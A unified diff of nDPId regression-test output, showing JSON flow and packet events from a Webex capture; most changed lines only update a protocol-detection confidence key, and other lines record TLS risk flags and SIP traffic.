+01394{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636264,"flow_last_seen":1444570636897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570636897,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":381,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636155,"flow_last_seen":1444570636963,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570636963,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570637191,"flow_last_seen":1444570637191,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570637191,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1444570637191,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1444570637191,"pkt":"ABoRAAACABoRAAABCABFAAKsAABAAEARgN0KCAABrBABS\/waE8QCmKnIUkVHSVNURVIgc2lwOjE3Mi4xNi4xLjc1O3RyYW5zcG9ydD1VRFAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMC4xMzMuMjA2LjQ3OjY0NTM4O2JyYW5jaD16OWhHNGJLLTUyNDI4Ny0xLS0tM2U0Njk4NjE4Y2ZiMmI3MztycG9ydA0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDo0NTE5MUAxMC4xMzMuMjA2LjQ3OjY0NTM4O3JpbnN0YW5jZT03YTQ2ZjFlMTI3MDJlN2ZiO3RyYW5zcG9ydD1VRFA+DQpUbzogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPg0KRnJvbTogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPjt0YWc9ZDM4MzM3NjcNCkNhbGwtSUQ6IEtvcExUdzl4c19sRXBDdGlQYTA3YlEuLg0KQ1NlcTogNCBSRUdJU1RFUg0KRXhwaXJlczogNjANCkFsbG93OiBJTlZJVEUsIEFDSywgQ0FOQ0VMLCBCWUUsIE5PVElGWSwgUkVGRVIsIE1FU1NBR0UsIE9QVElPTlMsIElORk8sIFNVQlNDUklCRQ0KU3VwcG9ydGVkOiByZXBsYWNlcywgbm9yZWZlcnN1YiwgZXh0ZW5kZWQtcmVmZXIsIHRpbWVyLCBvdXRib3VuZCwgcGF0aCwgWC1jaXNjby1zZXJ2aWNldXJpDQpVc2VyLUFnZW50OiBab2lwZXIgcjMzNjg4DQpBbGxvdy1FdmVudHM6IHByZXNlbmNlLCBrcG1sDQpDb250ZW50LUxlbmd0aDogMA0KDQo="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570637191,"flow_last_seen":1444570637191,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570637191,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636252,"flow_last_seen":1444570638198,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570638198,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":412,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636270,"flow_last_seen":1444570638199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570638199,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570637191,"flow_last_seen":1444570637191,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":656,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570637191,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570636252,"flow_last_seen":1444570638198,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1444570638198,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +01395{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":412,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570636270,"flow_last_seen":1444570638199,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570638199,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570638225,"flow_last_seen":1444570638225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570638225,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1444570638225,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570638225,"pkt":"ABoRAAACABoRAAABCABFAAA8UR1AAEAGNzMKCAAB2DrQKKmpAbtoC5J\/AAAAAKACOQjy7gAAAgQFtAQCCAoATMNiAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1444570638234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570638234,"pkt":"ABoRAAACABoRAAABCABFAAAoAeFAABAGtoPYOtAoCggAAQG7qamX9G2AaAuSgFAS\/\/9SAQAA"} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1444570638237,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1444570638237,"pkt":"ABoRAAACABoRAAABCABFAAKsAABAAEARgN0KCAABrBABS\/waE8QCmKnIUkVHSVNURVIgc2lwOjE3Mi4xNi4xLjc1O3RyYW5zcG9ydD1VRFAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMC4xMzMuMjA2LjQ3OjY0NTM4O2JyYW5jaD16OWhHNGJLLTUyNDI4Ny0xLS0tM2U0Njk4NjE4Y2ZiMmI3MztycG9ydA0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDo0NTE5MUAxMC4xMzMuMjA2LjQ3OjY0NTM4O3JpbnN0YW5jZT03YTQ2ZjFlMTI3MDJlN2ZiO3RyYW5zcG9ydD1VRFA+DQpUbzogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPg0KRnJvbTogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPjt0YWc9ZDM4MzM3NjcNCkNhbGwtSUQ6IEtvcExUdzl4c19sRXBDdGlQYTA3YlEuLg0KQ1NlcTogNCBSRUdJU1RFUg0KRXhwaXJlczogNjANCkFsbG93OiBJTlZJVEUsIEFDSywgQ0FOQ0VMLCBCWUUsIE5PVElGWSwgUkVGRVIsIE1FU1NBR0UsIE9QVElPTlMsIElORk8sIFNVQlNDUklCRQ0KU3VwcG9ydGVkOiByZXBsYWNlcywgbm9yZWZlcnN1YiwgZXh0ZW5kZWQtcmVmZXIsIHRpbWVyLCBvdXRib3VuZCwgcGF0aCwgWC1jaXNjby1zZXJ2aWNldXJpDQpVc2VyLUFnZW50OiBab2lwZXIgcjMzNjg4DQpBbGxvdy1FdmVudHM6IHByZXNlbmNlLCBrcG1sDQpDb250ZW50LUxlbmd0aDogMA0KDQo="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1444570639260,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570639260,"pkt":"ABoRAAACABoRAAABCABFAAAoUR5AAEAGN0YKCAAB2DrQKKmpAbtoC5KAl\/RtgVAQOQgY+gAA"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570638225,"flow_last_seen":1444570639266,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570639266,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"webex.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570638225,"flow_last_seen":1444570639266,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570639266,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"216.58.208.40","src_port":43433,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ssl.google-analytics.com","ja3":"75edb912bc6f0a222ae3e3e47f5c89b1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 01312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1444570639266,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":698,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":698,"pkt_l4_len":664,"thread_ts_msec":1444570639266,"pkt":"ABoRAAACABoRAAABCABFAAKsAABAAEARgN0KCAABrBABS\/waE8QCmKnIUkVHSVNURVIgc2lwOjE3Mi4xNi4xLjc1O3RyYW5zcG9ydD1VRFAgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxMC4xMzMuMjA2LjQ3OjY0NTM4O2JyYW5jaD16OWhHNGJLLTUyNDI4Ny0xLS0tM2U0Njk4NjE4Y2ZiMmI3MztycG9ydA0KTWF4LUZvcndhcmRzOiA3MA0KQ29udGFjdDogPHNpcDo0NTE5MUAxMC4xMzMuMjA2LjQ3OjY0NTM4O3JpbnN0YW5jZT03YTQ2ZjFlMTI3MDJlN2ZiO3RyYW5zcG9ydD1VRFA+DQpUbzogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPg0KRnJvbTogPHNpcDo0NTE5MUAxNzIuMTYuMS43NTt0cmFuc3BvcnQ9VURQPjt0YWc9ZDM4MzM3NjcNCkNhbGwtSUQ6IEtvcExUdzl4c19sRXBDdGlQYTA3YlEuLg0KQ1NlcTogNCBSRUdJU1RFUg0KRXhwaXJlczogNjANCkFsbG93OiBJTlZJVEUsIEFDSywgQ0FOQ0VMLCBCWUUsIE5PVElGWSwgUkVGRVIsIE1FU1NBR0UsIE9QVElPTlMsIElORk8sIFNVQlNDUklCRQ0KU3VwcG9ydGVkOiByZXBsYWNlcywgbm9yZWZlcnN1YiwgZXh0ZW5kZWQtcmVmZXIsIHRpbWVyLCBvdXRib3VuZCwgcGF0aCwgWC1jaXNjby1zZXJ2aWNldXJpDQpVc2VyLUFnZW50OiBab2lwZXIgcjMzNjg4DQpBbGxvdy1FdmVudHM6IHByZXNlbmNlLCBrcG1sDQpDb250ZW50LUxlbmd0aDogMA0KDQo="} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":461,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640269,"flow_last_seen":1444570640269,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570640269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1444570640269,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640269,"pkt":"ABoRAAACABoRAAABCABFAAA8fMBAAEAGd0oKCAABch3Ki7gfAbudV783AAAAAKACOQjtmQAAAgQFtAQCCAoATMP3AAAAAAEDAwY="} @@ -166,7 +166,7 @@ 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":474,"source":"webex.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1444570640344,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640344,"pkt":"ABoRAAACABoRAAABCABFAAAoAflAABAGP+k+beB4CggAAQG7x78XaeJ06JYdjFAS\/\/+9aAAA"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640346,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1444570640346,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1444570640346,"pkt":"ABoRAAACABoRAAABCABFAABLP\/ZAAEAGY3QKhc4vUEpuRIKzAbsvtI0Fj3ahWYAYAWE\/AgAAAQEICgBMxFRXHeViFQMBABJ8gv9dmaTjHFUtA85jnlaY0C8="} -00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640346,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1444570640346,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570640346,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":1,"thread_ts_msec":1444570640346,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"80.74.110.68","src_port":33459,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1444570640347,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570640347,"pkt":"ABoRAAACABoRAAABCABFAAA0P\/dAAEAGY4oKhc4vUEpuRIKzAbsvtI0cj3ahWYARAWFq6AAAAQEICgBMxFRXHeVi"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"webex.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1444570640347,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570640347,"pkt":"ABoRAAACABoRAAABCABFAAAoAfpAABAG0ZNQSm5ECoXOLwG7grOPdqFZL7SNHVAQ\/\/+mgQAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1444570640348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640348,"pkt":"ABoRAAACABoRAAABCABFAAA8fMFAAEAGd0kKCAABch3Ki7gfAbudV783AAAAAKACOQjtNQAAAgQFtAQCCAoATMRbAAAAAAEDAwY="} @@ -182,19 +182,19 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1444570640389,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640389,"pkt":"ABoRAAACABoRAAABCABFAAA8c3ZAAEAGE5IKCAABQERpZ6GyAbtpybCOAAAAAKACOQjY0wAAAgQFtAQCCAoATMRfAAAAAAEDAwY="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"webex.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1444570640395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570640395,"pkt":"ABoRAAACABoRAAABCABFAAA8tGlAAEAGXWQKCAABPm3geMe+AbssX3BwAAAAAKACOQi6+AAAAgQFtAQCCAoATMR8AAAAAAEDAwY="} 